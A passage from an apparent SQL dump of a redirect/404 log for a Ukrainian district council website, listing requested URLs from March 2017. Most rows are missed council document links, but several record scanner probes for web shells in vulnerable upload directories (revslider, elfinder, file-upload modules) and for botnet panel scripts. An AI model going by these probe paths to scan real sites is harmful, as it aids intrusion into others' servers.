00:53:46','0000-00-00 00:00:00',301),(29625,'http://malyn-rayrada.gov.ua/uBkqJ6.php',NULL,'','',1,0,'2017-03-17 00:53:56','0000-00-00 00:00:00',301),(29626,'http://malyn-rayrada.gov.ua/sites/all/libraries/elfinder/files/uBkqJ6.php',NULL,'','',1,0,'2017-03-17 00:54:15','0000-00-00 00:00:00',301),(29627,'http://www.malyn-rayrada.gov.ua/modules/mod_simplefileuploadv1.3/elements/3C7kOh.php',NULL,'','',1,0,'2017-03-17 00:58:35','0000-00-00 00:00:00',301),(29628,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/revslider/temp/update_extract/3C7kOh.php',NULL,'','',1,0,'2017-03-17 00:58:53','0000-00-00 00:00:00',301),(29629,'http://www.malyn-rayrada.gov.ua/wp-content/uploads/3C7kOh.php',NULL,'','',1,0,'2017-03-17 00:59:48','0000-00-00 00:00:00',301),(29630,'http://www.malyn-rayrada.gov.ua/3C7kOh.php',NULL,'','',1,0,'2017-03-17 01:00:03','0000-00-00 00:00:00',301),(29631,'http://www.malyn-rayrada.gov.ua/sites/all/libraries/elfinder/files/3C7kOh.php',NULL,'','',1,0,'2017-03-17 01:00:16','0000-00-00 00:00:00',301),(29632,'http://www.malyn-rayrada.gov.ua/index.php/1680-do-vidoma-deputativ-rajonnoji-radi',NULL,'','',35,0,'2017-03-17 02:04:04','0000-00-00 00:00:00',301),(29633,'http://www.malyn-rayrada.gov.ua/modules/mod_fxprev/index.html',NULL,'http://www.malyn-rayrada.gov.ua/modules/mod_fxprev/index.html','',1,0,'2017-03-17 13:17:14','0000-00-00 00:00:00',301),(29634,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1673-pro-zakrittya-viddilennya-statsionarnogo-doglyadu-ta-vporyadkuvannya-strukturi-teritorialnogo-tsentru-sotsialnogo-obslugovuvannya-nadannya-sotsialnikh-poslug-malinskogo-rajonu',NULL,'','',24,0,'2017-03-17 19:49:33','0000-00-00 00:00:00',301),(29635,'http://www.malyn-rayrada.gov.ua/index.php/1647-pro-sklikannya-15-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',40,0,'2017-03-17 21:13:59','0000-00-00 00:00:00',301),(29636,'http://malyn-rayrada.gov.ua/index.php/1647-pro-sklikannya-15-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',46,0,'2017-03-19 09:28:10','0000-00-00 00:00:00',301),(29637,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1673-pro-zakrittya-viddilennya-statsionarnogo-doglyadu-ta-vporyadkuvannya-strukturi-teritorialnogo-tsentru-sotsialnogo-obslugovuvannya-nadannya-sotsialnikh-poslug-malinskogo-rajonu',NULL,'','',43,0,'2017-03-19 11:06:34','0000-00-00 00:00:00',301),(29638,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1689-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2017-rik',NULL,'','',38,0,'2017-03-23 00:13:05','0000-00-00 00:00:00',301),(29639,'http://www.malyn-rayrada.gov.ua/options/logo_img.php',NULL,'http://www.malyn-rayrada.gov.ua/options/logo_img.php','',1,0,'2017-03-24 02:26:19','0000-00-00 00:00:00',301),(29640,'http://malyn-rayrada.gov.ua/options/logo_img.php',NULL,'http://malyn-rayrada.gov.ua/options/logo_img.php','',1,0,'2017-03-24 08:12:05','0000-00-00 00:00:00',301),(29641,'http://malyn-rayrada.gov.ua/templates/beez/index.php',NULL,'','',2,0,'2017-03-24 10:42:55','0000-00-00 00:00:00',301),(29642,'http://malyn-rayrada.gov.ua/plugins/content/upgrade/ncpf.php??',NULL,'','',1,0,'2017-03-24 10:43:57','0000-00-00 00:00:00',301),(29643,'http://malyn-rayrada.gov.ua/index.php?option=com_user&view=reset&layout=confirm',NULL,'','',2,0,'2017-03-24 15:09:21','0000-00-00 00:00:00',301),(29644,'http://malyn-rayrada.gov.ua/attachments/article/1691/Ð¿Ñ–Ð´Ñ ÑƒÐ¼ÐºÐ¸ відкритого Ð³Ð¾Ð»Ð¾Ñ ÑƒÐ²Ð°Ð½Ð½Ñ 1.pdf',NULL,'','',2,0,'2017-03-25 16:31:06','0000-00-00 00:00:00',301),(29645,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1689-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2017-rik',NULL,'','',34,0,'2017-03-25 18:47:21','0000-00-00 00:00:00',301),(29646,'http://malyn-rayrada.gov.ua/attachments/article/1699/додаток',NULL,'','',1,0,'2017-03-26 01:59:05','0000-00-00 00:00:00',301),(29647,'http://malyn-rayrada.gov.ua/attachments/article/1702/результати',NULL,'','',1,0,'2017-03-26 01:59:09','0000-00-00 00:00:00',301),(29648,'http://malyn-rayrada.gov.ua/attachments/article/1447/222',NULL,'','',1,0,'2017-03-26 02:08:36','0000-00-00 00:00:00',301),(29649,'http://malyn-rayrada.gov.ua/attachments/article/1518/Про',NULL,'','',1,0,'2017-03-26 02:08:42','0000-00-00 00:00:00',301),(29650,'http://malyn-rayrada.gov.ua/attachments/article/1518/Повідомлення',NULL,'','',1,0,'2017-03-26 02:08:44','0000-00-00 00:00:00',301),(29651,'http://malyn-rayrada.gov.ua/attachments/article/1518/Аналіз',NULL,'','',1,0,'2017-03-26 02:08:47','0000-00-00 00:00:00',301),(29652,'http://malyn-rayrada.gov.ua/attachments/article/1651/Копия',NULL,'','',1,0,'2017-03-26 02:08:51','0000-00-00 00:00:00',301),(29653,'http://malyn-rayrada.gov.ua/attachments/article/1644/Прогр',NULL,'','',1,0,'2017-03-26 02:10:12','0000-00-00 00:00:00',301),(29654,'http://malyn-rayrada.gov.ua/attachments/article/1661/ПРОГРАМА',NULL,'','',1,0,'2017-03-26 02:10:14','0000-00-00 00:00:00',301),(29655,'http://malyn-rayrada.gov.ua/attachments/article/1661/звіт',NULL,'','',1,0,'2017-03-26 02:10:14','0000-00-00 00:00:00',301),(29656,'http://malyn-rayrada.gov.ua/attachments/article/1666/Програма',NULL,'','',1,0,'2017-03-26 02:10:18','0000-00-00 00:00:00',301),(29657,'http://malyn-rayrada.gov.ua/attachments/article/1668/Прог',NULL,'','',1,0,'2017-03-26 02:10:21','0000-00-00 00:00:00',301),(29658,'http://malyn-rayrada.gov.ua/attachments/article/1669/ДОДАТОК',NULL,'','',1,0,'2017-03-26 02:10:23','0000-00-00 00:00:00',301),(29659,'http://malyn-rayrada.gov.ua/attachments/article/1669/ДОДАТКИ',NULL,'','',1,0,'2017-03-26 02:10:26','0000-00-00 00:00:00',301),(29660,'http://malyn-rayrada.gov.ua/attachments/article/1686/районна',NULL,'','',1,0,'2017-03-26 02:10:33','0000-00-00 00:00:00',301),(29661,'http://malyn-rayrada.gov.ua/attachments/article/1688/Дод',NULL,'','',1,0,'2017-03-26 02:10:42','0000-00-00 00:00:00',301),(29662,'http://malyn-rayrada.gov.ua/attachments/article/1691/підсумки',NULL,'','',1,0,'2017-03-26 02:10:48','0000-00-00 00:00:00',301),(29663,'http://malyn-rayrada.gov.ua/attachments/article/1694/додаток',NULL,'','',1,0,'2017-03-26 02:10:52','0000-00-00 00:00:00',301),(29664,'http://malyn-rayrada.gov.ua/attachments/article/1635/додаток',NULL,'','',1,0,'2017-03-26 02:11:04','0000-00-00 00:00:00',301),(29665,'http://malyn-rayrada.gov.ua/attachments/article/1638/Поіменне',NULL,'','',1,0,'2017-03-26 02:11:19','0000-00-00 00:00:00',301),(29666,'http://malyn-rayrada.gov.ua/attachments/article/1627/Прогр',NULL,'','',1,0,'2017-03-26 02:11:29','0000-00-00 00:00:00',301),(29667,'http://malyn-rayrada.gov.ua/attachments/article/1604/Програма_фiзкул_тура_i_спорт_2017-2020',NULL,'','',1,0,'2017-03-26 02:12:17','0000-00-00 00:00:00',301),(29668,'http://malyn-rayrada.gov.ua/attachments/article/1605/Програма',NULL,'','',1,0,'2017-03-26 02:12:19','0000-00-00 00:00:00',301),(29669,'http://malyn-rayrada.gov.ua/attachments/article/1619/Прогр_захисту',NULL,'','',1,0,'2017-03-26 02:12:21','0000-00-00 00:00:00',301),(29670,'http://malyn-rayrada.gov.ua/attachments/article/1625/Програма',NULL,'','',1,0,'2017-03-26 02:12:23','0000-00-00 00:00:00',301),(29671,'http://malyn-rayrada.gov.ua/attachments/article/1632/додаток',NULL,'','',1,0,'2017-03-26 02:12:31','0000-00-00 00:00:00',301),(29672,'http://malyn-rayrada.gov.ua/attachments/article/1633/підсумки',NULL,'','',1,0,'2017-03-26 02:12:36','0000-00-00 00:00:00',301),(29673,'http://malyn-rayrada.gov.ua/attachments/article/1613/додаток',NULL,'','',1,0,'2017-03-26 02:12:40','0000-00-00 00:00:00',301),(29674,'http://malyn-rayrada.gov.ua/attachments/article/1614/підсумки',NULL,'','',1,0,'2017-03-26 02:12:45','0000-00-00 00:00:00',301),(29675,'http://malyn-rayrada.gov.ua/attachments/article/1583/Підсумки',NULL,'','',1,0,'2017-03-26 02:12:51','0000-00-00 00:00:00',301),(29676,'http://malyn-rayrada.gov.ua/attachments/article/1584/додаток',NULL,'','',1,0,'2017-03-26 02:12:58','0000-00-00 00:00:00',301),(29677,'http://malyn-rayrada.gov.ua/attachments/article/1576/додаток',NULL,'','',1,0,'2017-03-26 02:13:12','0000-00-00 00:00:00',301),(29678,'http://malyn-rayrada.gov.ua/attachments/article/1577/Підсумки',NULL,'','',1,0,'2017-03-26 02:13:17','0000-00-00 00:00:00',301),(29679,'http://malyn-rayrada.gov.ua/attachments/article/1564/Інформація',NULL,'','',1,0,'2017-03-26 02:13:33','0000-00-00 00:00:00',301),(29680,'http://malyn-rayrada.gov.ua/attachments/article/1567/Програма',NULL,'','',1,0,'2017-03-26 02:14:17','0000-00-00 00:00:00',301),(29681,'http://malyn-rayrada.gov.ua/attachments/article/1572/Підсумки',NULL,'','',1,0,'2017-03-26 02:14:40','0000-00-00 00:00:00',301),(29682,'http://malyn-rayrada.gov.ua/attachments/article/1574/додаток',NULL,'','',1,0,'2017-03-26 02:14:44','0000-00-00 00:00:00',301),(29683,'http://malyn-rayrada.gov.ua/attachments/article/1531/Підсумки',NULL,'','',1,0,'2017-03-26 02:15:03','0000-00-00 00:00:00',301),(29684,'http://malyn-rayrada.gov.ua/attachments/article/1456/ПРОГРАМА',NULL,'','',1,0,'2017-03-26 02:16:03','0000-00-00 00:00:00',301),(29685,'http://malyn-rayrada.gov.ua/attachments/article/1465/Розпорядження',NULL,'','',1,0,'2017-03-26 02:16:04','0000-00-00 00:00:00',301),(29686,'http://malyn-rayrada.gov.ua/attachments/article/1504/додаток',NULL,'','',1,0,'2017-03-26 02:16:13','0000-00-00 00:00:00',301),(29687,'http://malyn-rayrada.gov.ua/attachments/article/1506/Підсумки',NULL,'','',1,0,'2017-03-26 02:16:19','0000-00-00 00:00:00',301),(29688,'http://malyn-rayrada.gov.ua/attachments/article/1444/Підсумки',NULL,'','',1,0,'2017-03-26 02:16:36','0000-00-00 00:00:00',301),(29689,'http://malyn-rayrada.gov.ua/attachments/article/1407/Програма',NULL,'','',1,0,'2017-03-26 02:16:58','0000-00-00 00:00:00',301),(29690,'http://malyn-rayrada.gov.ua/attachments/article/1431/Підсумки',NULL,'','',1,0,'2017-03-26 02:17:05','0000-00-00 00:00:00',301),(29691,'http://malyn-rayrada.gov.ua/attachments/article/1432/додаток',NULL,'','',1,0,'2017-03-26 02:17:09','0000-00-00 00:00:00',301),(29692,'http://malyn-rayrada.gov.ua/attachments/article/1373/Програма',NULL,'','',1,0,'2017-03-26 02:19:16','0000-00-00 00:00:00',301),(29693,'http://malyn-rayrada.gov.ua/attachments/article/1387/прогр_бігборди_',NULL,'','',1,0,'2017-03-26 02:19:25','0000-00-00 00:00:00',301),(29694,'http://malyn-rayrada.gov.ua/attachments/article/1388/програма',NULL,'','',1,0,'2017-03-26 02:19:31','0000-00-00 00:00:00',301),(29695,'http://malyn-rayrada.gov.ua/attachments/article/1393/програма',NULL,'','',1,0,'2017-03-26 02:19:33','0000-00-00 00:00:00',301),(29696,'http://malyn-rayrada.gov.ua/attachments/article/1402/Підсумки',NULL,'','',1,0,'2017-03-26 02:19:58','0000-00-00 00:00:00',301),(29697,'http://malyn-rayrada.gov.ua/attachments/article/1405/додаток',NULL,'','',1,0,'2017-03-26 02:20:08','0000-00-00 00:00:00',301),(29698,'http://malyn-rayrada.gov.ua/attachments/article/1339/Програма',NULL,'','',1,0,'2017-03-26 02:20:28','0000-00-00 00:00:00',301),(29699,'http://malyn-rayrada.gov.ua/attachments/article/1344/додаток',NULL,'','',1,0,'2017-03-26 02:20:42','0000-00-00 00:00:00',301),(29700,'http://malyn-rayrada.gov.ua/attachments/article/1323/Програма',NULL,'','',1,0,'2017-03-26 02:20:51','0000-00-00 00:00:00',301),(29701,'http://malyn-rayrada.gov.ua/attachments/article/1321/Прогр',NULL,'','',1,0,'2017-03-26 02:22:05','0000-00-00 00:00:00',301),(29702,'http://malyn-rayrada.gov.ua/attachments/article/1322/ПРОГРАМА',NULL,'','',1,0,'2017-03-26 02:22:08','0000-00-00 00:00:00',301),(29703,'http://malyn-rayrada.gov.ua/attachments/article/1325/Програма',NULL,'','',1,0,'2017-03-26 02:22:16','0000-00-00 00:00:00',301),(29704,'http://malyn-rayrada.gov.ua/attachments/article/1326/Програма',NULL,'','',1,0,'2017-03-26 02:22:20','0000-00-00 00:00:00',301),(29705,'http://malyn-rayrada.gov.ua/attachments/article/1328/додаток',NULL,'','',1,0,'2017-03-26 02:22:26','0000-00-00 00:00:00',301),(29706,'http://malyn-rayrada.gov.ua/attachments/article/1329/додаток',NULL,'','',1,0,'2017-03-26 02:22:31','0000-00-00 00:00:00',301),(29707,'http://malyn-rayrada.gov.ua/attachments/article/1482/протокол',NULL,'','',1,0,'2017-03-26 02:23:50','0000-00-00 00:00:00',301),(29708,'http://malyn-rayrada.gov.ua/attachments/article/1696/протокол',NULL,'','',1,0,'2017-03-26 02:23:59','0000-00-00 00:00:00',301),(29709,'http://malyn-rayrada.gov.ua/attachments/article/2/Декларація',NULL,'','',1,0,'2017-03-26 02:25:01','0000-00-00 00:00:00',301),(29710,'http://malyn-rayrada.gov.ua/attachments/article/1436/Декларація',NULL,'','',1,0,'2017-03-26 02:25:28','0000-00-00 00:00:00',301),(29711,'http://malyn-rayrada.gov.ua/attachments/article/1436/Декларації',NULL,'','',1,0,'2017-03-26 02:25:33','0000-00-00 00:00:00',301),(29712,'http://malyn-rayrada.gov.ua/872537b1-50eb-4ca2-8483-a0ba9cfc9088',NULL,'','',1,0,'2017-03-26 04:55:34','0000-00-00 00:00:00',301),(29713,'http://www.malyn-rayrada.gov.ua/index.php/asfdfa.php',NULL,'','',7,0,'2017-03-26 11:13:57','0000-00-00 00:00:00',301),(29714,'http://www.malyn-rayrada.gov.ua/index.php/include/login.php',NULL,'','',7,0,'2017-03-26 11:13:58','0000-00-00 00:00:00',301),(29715,'http://www.malyn-rayrada.gov.ua/index.php/include/chart.php',NULL,'','',7,0,'2017-03-26 11:13:58','0000-00-00 00:00:00',301),(29716,'http://www.malyn-rayrada.gov.ua/index.php/include/activecmd.php',NULL,'','',7,0,'2017-03-26 11:13:58','0000-00-00 00:00:00',301),(29717,'http://www.malyn-rayrada.gov.ua/index.php/include/function.php',NULL,'','',7,0,'2017-03-26 11:13:58','0000-00-00 00:00:00',301),(29718,'http://www.malyn-rayrada.gov.ua/index.php/main.css',NULL,'','',7,0,'2017-03-26 11:13:58','0000-00-00 00:00:00',301),(29719,'http://www.malyn-rayrada.gov.ua/index.php/images/bar.png',NULL,'','',7,0,'2017-03-26 11:13:58','0000-00-00 00:00:00',301),(29720,'http://www.malyn-rayrada.gov.ua/index.php/theme/style.css',NULL,'','',7,0,'2017-03-26 11:13:59','0000-00-00 00:00:00',301),(29721,'http://www.malyn-rayrada.gov.ua/index.php/admin.php',NULL,'','',40,0,'2017-03-26 11:14:00','0000-00-00 00:00:00',301),(29722,'http://www.malyn-rayrada.gov.ua/index.php/include/config.php',NULL,'','',5,0,'2017-03-26 11:14:00','0000-00-00 00:00:00',301),(29723,'http://www.malyn-rayrada.gov.ua/index.php/css/',NULL,'','',25,0,'2017-03-26 11:14:00','0000-00-00 00:00:00',301),(29724,'http://www.malyn-rayrada.gov.ua/index.php/css/content.css',NULL,'','',5,0,'2017-03-26 11:14:00','0000-00-00 00:00:00',301),(29725,'http://www.malyn-rayrada.gov.ua/index.php/css/reset.css',NULL,'','',5,0,'2017-03-26 11:14:00','0000-00-00 00:00:00',301),(29726,'http://www.malyn-rayrada.gov.ua/index.php/images/',NULL,'','',5,0,'2017-03-26 11:14:00','0000-00-00 00:00:00',301),(29727,'http://www.malyn-rayrada.gov.ua/index.php/images/gear.png',NULL,'','',5,0,'2017-03-26 11:14:01','0000-00-00 00:00:00',301),(29728,'http://www.malyn-rayrada.gov.ua/index.php/images/header.png',NULL,'','',5,0,'2017-03-26 11:14:01','0000-00-00 00:00:00',301),(29729,'http://www.malyn-rayrada.gov.ua/index.php/images/user_female.png',NULL,'','',5,0,'2017-03-26 11:14:01','0000-00-00 00:00:00',301),(29730,'http://www.malyn-rayrada.gov.ua/index.php/images/arrow_left_ovr.png',NULL,'','',5,0,'2017-03-26 11:14:01','0000-00-00 00:00:00',301),(29731,'http://www.malyn-rayrada.gov.ua/index.php/images/bck_attention.png',NULL,'','',5,0,'2017-03-26 11:14:01','0000-00-00 00:00:00',301),(29732,'http://www.malyn-rayrada.gov.ua/index.php/login.php',NULL,'','',87,0,'2017-03-26 11:14:02','0000-00-00 00:00:00',301),(29733,'http://www.malyn-rayrada.gov.ua/index.php/asdfdsafdsfsadf.php',NULL,'','',7,0,'2017-03-26 11:14:02','0000-00-00 00:00:00',301),(29734,'http://www.malyn-rayrada.gov.ua/index.php/security_number.php',NULL,'','',14,0,'2017-03-26 11:14:02','0000-00-00 00:00:00',301),(29735,'http://www.malyn-rayrada.gov.ua/index.php/connect.php',NULL,'','',14,0,'2017-03-26 11:14:02','0000-00-00 00:00:00',301),(29736,'http://www.malyn-rayrada.gov.ua/index.php/inc/',NULL,'','',14,0,'2017-03-26 11:14:04','0000-00-00 00:00:00',301),(29737,'http://www.malyn-rayrada.gov.ua/index.php/images/ico/',NULL,'','',14,0,'2017-03-26 11:14:05','0000-00-00 00:00:00',301),(29738,'http://www.malyn-rayrada.gov.ua/index.php/images/png/',NULL,'','',14,0,'2017-03-26 11:14:05','0000-00-00 00:00:00',301),(29739,'http://www.malyn-rayrada.gov.ua/index.php/images/preloaders/',NULL,'','',14,0,'2017-03-26 11:14:06','0000-00-00 00:00:00',301),(29740,'http://www.malyn-rayrada.gov.ua/index.php/config.php',NULL,'','',39,0,'2017-03-26 11:14:08','0000-00-00 00:00:00',301),(29741,'http://www.malyn-rayrada.gov.ua/index.php/style_dark.css',NULL,'','',13,0,'2017-03-26 11:14:08','0000-00-00 00:00:00',301),(29742,'http://www.malyn-rayrada.gov.ua/index.php/index.html',NULL,'','',12,0,'2017-03-26 11:14:09','0000-00-00 00:00:00',301),(29743,'http://www.malyn-rayrada.gov.ua/index.php/graphics/banner.png',NULL,'','',5,0,'2017-03-26 11:14:09','0000-00-00 00:00:00',301),(29744,'http://www.malyn-rayrada.gov.ua/index.php/login.js',NULL,'','',5,0,'2017-03-26 11:14:09','0000-00-00 00:00:00',301),(29745,'http://www.malyn-rayrada.gov.ua/index.php/project.php',NULL,'','',5,0,'2017-03-26 11:14:10','0000-00-00 00:00:00',301),(29746,'http://www.malyn-rayrada.gov.ua/index.php/lend.php',NULL,'','',12,0,'2017-03-26 11:14:11','0000-00-00 00:00:00',301),(29747,'http://www.malyn-rayrada.gov.ua/index.php/lending/index.php',NULL,'','',30,0,'2017-03-26 11:14:11','0000-00-00 00:00:00',301),(29748,'http://www.malyn-rayrada.gov.ua/index.php/asdfdsfasfdasfsd.php',NULL,'','',6,0,'2017-03-26 11:14:11','0000-00-00 00:00:00',301),(29749,'http://www.malyn-rayrada.gov.ua/index.php/anal.php',NULL,'','',6,0,'2017-03-26 11:14:11','0000-00-00 00:00:00',301),(29750,'http://www.malyn-rayrada.gov.ua/index.php/biling.php',NULL,'','',6,0,'2017-03-26 11:14:12','0000-00-00 00:00:00',301),(29751,'http://www.malyn-rayrada.gov.ua/index.php/logout.php',NULL,'','',19,0,'2017-03-26 11:14:12','0000-00-00 00:00:00',301),(29752,'http://www.malyn-rayrada.gov.ua/index.php/change.php',NULL,'','',6,0,'2017-03-26 11:14:12','0000-00-00 00:00:00',301),(29753,'http://www.malyn-rayrada.gov.ua/index.php/statss.php',NULL,'','',6,0,'2017-03-26 11:14:12','0000-00-00 00:00:00',301),(29754,'http://www.malyn-rayrada.gov.ua/index.php/images/btn_submit.png',NULL,'','',18,0,'2017-03-26 11:14:12','0000-00-00 00:00:00',301),(29755,'http://www.malyn-rayrada.gov.ua/index.php/support.php',NULL,'','',12,0,'2017-03-26 11:14:13','0000-00-00 00:00:00',301),(29756,'http://www.malyn-rayrada.gov.ua/index.php/lending/img/arab.png',NULL,'','',18,0,'2017-03-26 11:14:13','0000-00-00 00:00:00',301),(29757,'http://www.malyn-rayrada.gov.ua/index.php/images/icn_edit.png',NULL,'','',18,0,'2017-03-26 11:14:14','0000-00-00 00:00:00',301),(29758,'http://www.malyn-rayrada.gov.ua/index.php/js/hideshow.js',NULL,'','',12,0,'2017-03-26 11:14:15','0000-00-00 00:00:00',301),(29759,'http://www.malyn-rayrada.gov.ua/index.php/lending/img/fbi.png',NULL,'','',6,0,'2017-03-26 11:14:18','0000-00-00 00:00:00',301),(29760,'http://www.malyn-rayrada.gov.ua/index.php/images/icn_search.png',NULL,'','',6,0,'2017-03-26 11:14:18','0000-00-00 00:00:00',301),(29761,'http://www.malyn-rayrada.gov.ua/index.php/images/breadcrumb_divider.png',NULL,'','',6,0,'2017-03-26 11:14:19','0000-00-00 00:00:00',301),(29762,'http://www.malyn-rayrada.gov.ua/index.php/resources/images/b.png',NULL,'','',6,0,'2017-03-26 11:14:19','0000-00-00 00:00:00',301),(29763,'http://www.malyn-rayrada.gov.ua/index.php/cron.php',NULL,'','',7,0,'2017-03-26 11:14:22','0000-00-00 00:00:00',301),(29764,'http://www.malyn-rayrada.gov.ua/index.php/tasks.php',NULL,'','',25,0,'2017-03-26 11:14:22','0000-00-00 00:00:00',301),(29765,'http://www.malyn-rayrada.gov.ua/index.php/stats.php',NULL,'','',7,0,'2017-03-26 11:14:22','0000-00-00 00:00:00',301),(29766,'http://www.malyn-rayrada.gov.ua/index.php/run.php',NULL,'','',7,0,'2017-03-26 11:14:22','0000-00-00 00:00:00',301),(29767,'http://www.malyn-rayrada.gov.ua/index.php/asdfddsas.php',NULL,'','',7,0,'2017-03-26 11:14:23','0000-00-00 00:00:00',301),(29768,'http://www.malyn-rayrada.gov.ua/panel/login.php',NULL,'','',8,0,'2017-03-26 11:14:27','0000-00-00 00:00:00',301),(29769,'http://www.malyn-rayrada.gov.ua/index.php/cp.php',NULL,'','',13,0,'2017-03-26 11:14:30','0000-00-00 00:00:00',301),(29770,'http://www.malyn-rayrada.gov.ua/index.php/theme/images/back-all.jpg',NULL,'','',7,0,'2017-03-26 11:14:30','0000-00-00 00:00:00',301),(29771,'http://www.malyn-rayrada.gov.ua/index.php/theme/header.html',NULL,'','',13,0,'2017-03-26 11:14:30','0000-00-00 00:00:00',301),(29772,'http://www.malyn-rayrada.gov.ua/index.php/back.css',NULL,'','',7,0,'2017-03-26 11:14:31','0000-00-00 00:00:00',301),(29773,'http://www.malyn-rayrada.gov.ua/index.php/tmp',NULL,'','',7,0,'2017-03-26 11:14:32','0000-00-00 00:00:00',301),(29774,'http://www.malyn-rayrada.gov.ua/index.php/tmp/',NULL,'','',7,0,'2017-03-26 11:14:32','0000-00-00 00:00:00',301),(29775,'http://www.malyn-rayrada.gov.ua/index.php/vendor',NULL,'','',7,0,'2017-03-26 11:14:32','0000-00-00 00:00:00',301),(29776,'http://www.malyn-rayrada.gov.ua/index.php/vendor/',NULL,'','',7,0,'2017-03-26 11:14:33','0000-00-00 00:00:00',301),(29777,'http://www.malyn-rayrada.gov.ua/index.php/lib',NULL,'','',7,0,'2017-03-26 11:14:33','0000-00-00 00:00:00',301),(29778,'http://www.malyn-rayrada.gov.ua/index.php/lib/',NULL,'','',7,0,'2017-03-26 11:14:33','0000-00-00 00:00:00',301),(29779,'http://www.malyn-rayrada.gov.ua/index.php/app',NULL,'','',7,0,'2017-03-26 11:14:34','0000-00-00 00:00:00',301),(29780,'http://www.malyn-rayrada.gov.ua/index.php/app/',NULL,'','',6,0,'2017-03-26 11:14:34','0000-00-00 00:00:00',301),(29781,'http://www.malyn-rayrada.gov.ua/index.php/tmp/logs',NULL,'','',6,0,'2017-03-26 11:14:34','0000-00-00 00:00:00',301),(29782,'http://www.malyn-rayrada.gov.ua/index.php/tmp/logs/',NULL,'','',6,0,'2017-03-26 11:14:35','0000-00-00 00:00:00',301),(29783,'http://www.malyn-rayrada.gov.ua/index.php/uploads',NULL,'','',6,0,'2017-03-26 11:14:35','0000-00-00 00:00:00',301),(29784,'http://www.malyn-rayrada.gov.ua/index.php/uploads/',NULL,'','',6,0,'2017-03-26 11:14:35','0000-00-00 00:00:00',301),(29785,'http://www.malyn-rayrada.gov.ua/index.php/public',NULL,'','',6,0,'2017-03-26 11:14:35','0000-00-00 00:00:00',301),(29786,'http://www.malyn-rayrada.gov.ua/index.php/public/',NULL,'','',6,0,'2017-03-26 11:14:35','0000-00-00 00:00:00',301),(29787,'http://www.malyn-rayrada.gov.ua/index.php/public/css/app.css',NULL,'','',6,0,'2017-03-26 11:14:35','0000-00-00 00:00:00',301),(29788,'http://www.malyn-rayrada.gov.ua/index.php/img/favicon.png',NULL,'','',6,0,'2017-03-26 11:14:36','0000-00-00 00:00:00',301),(29789,'http://www.malyn-rayrada.gov.ua/index.php/img/logo.png',NULL,'','',51,0,'2017-03-26 11:14:36','0000-00-00 00:00:00',301),(29790,'http://www.malyn-rayrada.gov.ua/index.php/management.php',NULL,'','',12,0,'2017-03-26 11:14:36','0000-00-00 00:00:00',301),(29791,'http://www.malyn-rayrada.gov.ua/index.php/css/vectormap.css',NULL,'','',12,0,'2017-03-26 11:14:37','0000-00-00 00:00:00',301),(29792,'http://www.malyn-rayrada.gov.ua/index.php/js/manag.js',NULL,'','',12,0,'2017-03-26 11:14:37','0000-00-00 00:00:00',301),(29793,'http://www.malyn-rayrada.gov.ua/index.php/js/tasks.js',NULL,'','',12,0,'2017-03-26 11:14:37','0000-00-00 00:00:00',301),(29794,'http://www.malyn-rayrada.gov.ua/index.php/img/',NULL,'','',25,0,'2017-03-26 11:14:38','0000-00-00 00:00:00',301),(29795,'http://www.malyn-rayrada.gov.ua/index.php/statistics.php',NULL,'','',19,0,'2017-03-26 11:14:39','0000-00-00 00:00:00',301),(29796,'http://www.malyn-rayrada.gov.ua/client/accept.php',NULL,'','',8,0,'2017-03-26 11:14:40','0000-00-00 00:00:00',301),(29797,'http://www.malyn-rayrada.gov.ua/index.php/home.php',NULL,'','',7,0,'2017-03-26 11:14:40','0000-00-00 00:00:00',301),(29798,'http://www.malyn-rayrada.gov.ua/login.php',NULL,'','',23,0,'2017-03-26 11:14:42','0000-00-00 00:00:00',301),(29799,'http://www.malyn-rayrada.gov.ua/index.php/main.php',NULL,'','',15,0,'2017-03-26 11:14:43','0000-00-00 00:00:00',301),(29800,'http://www.malyn-rayrada.gov.ua/index.php/submit.php',NULL,'','',5,0,'2017-03-26 11:14:43','0000-00-00 00:00:00',301),(29801,'http://www.malyn-rayrada.gov.ua/index.php/style.css',NULL,'','',6,0,'2017-03-26 11:14:44','0000-00-00 00:00:00',301),(29802,'http://www.malyn-rayrada.gov.ua/index.php/includes/design/images/favicon.ico',NULL,'','',6,0,'2017-03-26 11:14:45','0000-00-00 00:00:00',301),(29803,'http://www.malyn-rayrada.gov.ua/index.php/assets/img/favicon.ico',NULL,'','',5,0,'2017-03-26 11:14:45','0000-00-00 00:00:00',301),(29804,'http://www.malyn-rayrada.gov.ua/index.php/order.php',NULL,'','',5,0,'2017-03-26 11:14:46','0000-00-00 00:00:00',301),(29805,'http://www.malyn-rayrada.gov.ua/index.php/captcha.php',NULL,'','',5,0,'2017-03-26 11:14:46','0000-00-00 00:00:00',301),(29806,'http://www.malyn-rayrada.gov.ua/index.php/gdx/gdx.php',NULL,'','',5,0,'2017-03-26 11:14:46','0000-00-00 00:00:00',301),(29807,'http://www.malyn-rayrada.gov.ua/index.php/gdx/itnernal.php',NULL,'','',5,0,'2017-03-26 11:14:46','0000-00-00 00:00:00',301),(29808,'http://www.malyn-rayrada.gov.ua/index.php/images/flags/ag.png',NULL,'','',5,0,'2017-03-26 11:14:46','0000-00-00 00:00:00',301),(29809,'http://www.malyn-rayrada.gov.ua/index.php/includes/bot_info.php',NULL,'','',7,0,'2017-03-26 11:14:48','0000-00-00 00:00:00',301),(29810,'http://www.malyn-rayrada.gov.ua/index.php/includes/hexdecode.php',NULL,'','',6,0,'2017-03-26 11:14:48','0000-00-00 00:00:00',301),(29811,'http://www.malyn-rayrada.gov.ua/index.php/includes/stats.php',NULL,'','',6,0,'2017-03-26 11:14:48','0000-00-00 00:00:00',301),(29812,'http://www.malyn-rayrada.gov.ua/index.php/images/delete.png',NULL,'','',6,0,'2017-03-26 11:14:49','0000-00-00 00:00:00',301),(29813,'http://www.malyn-rayrada.gov.ua/index.php/images/info.png',NULL,'','',6,0,'2017-03-26 11:14:49','0000-00-00 00:00:00',301),(29814,'http://www.malyn-rayrada.gov.ua/index.php/includes/delete_command.php',NULL,'','',6,0,'2017-03-26 11:14:49','0000-00-00 